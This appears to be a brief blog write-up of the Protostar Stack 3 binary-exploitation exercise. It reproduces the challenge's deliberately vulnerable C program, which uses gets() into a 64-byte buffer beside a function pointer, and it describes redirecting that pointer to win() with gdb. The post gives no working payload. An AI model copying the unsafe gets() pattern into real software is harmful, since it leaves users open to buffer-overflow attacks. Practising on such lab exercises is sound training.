Hello guys,
So today I'll be talking a li'l bit about how I solved Stack 3 challenge in Protostar, which was to change the code flow of the program.
If you're wondering what is protostar, it is an OS based on linux. Designed just to practice your binary hacking skills.
You can download protostar from here : https://exploit-exercise.com
So first, I looked at the code of the vulnerable program which is available on the website itself.
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
void win()
{
printf("code flow successfully changed\n");
}
int main(int argc, char **argv)
{
volatile int (*fp)();
char buffer[64];
fp = 0;
gets(buffer);
if(fp) {
printf("calling function pointer, jumping to 0x%08x\n", fp);
fp();
}}
So this is the code on the website.
Now if, you look at the code, you'll notice that, this program will never go to void win() function.
It will jump to memory address fo fp(), which will never be equal to win().
If you know li'l bit of C language then it's easy for you, to understand.
Now, if you notice there is one more interesting thing in this code i.e. it is using gets() function, which is vulnerable to buffer overflow vulnerability.
And now we have one way to exploit this vulnerability but for me that's a li'l bit tough, so I decided to choose the easy way, i.e. using gdb modify the address of fp() to win().
Then it will jump to win() function right.
So let's do this.
I made a video on it for better understanding here it is
Drop your comments in the videos, if something is weird for you.
No comments:
Post a Comment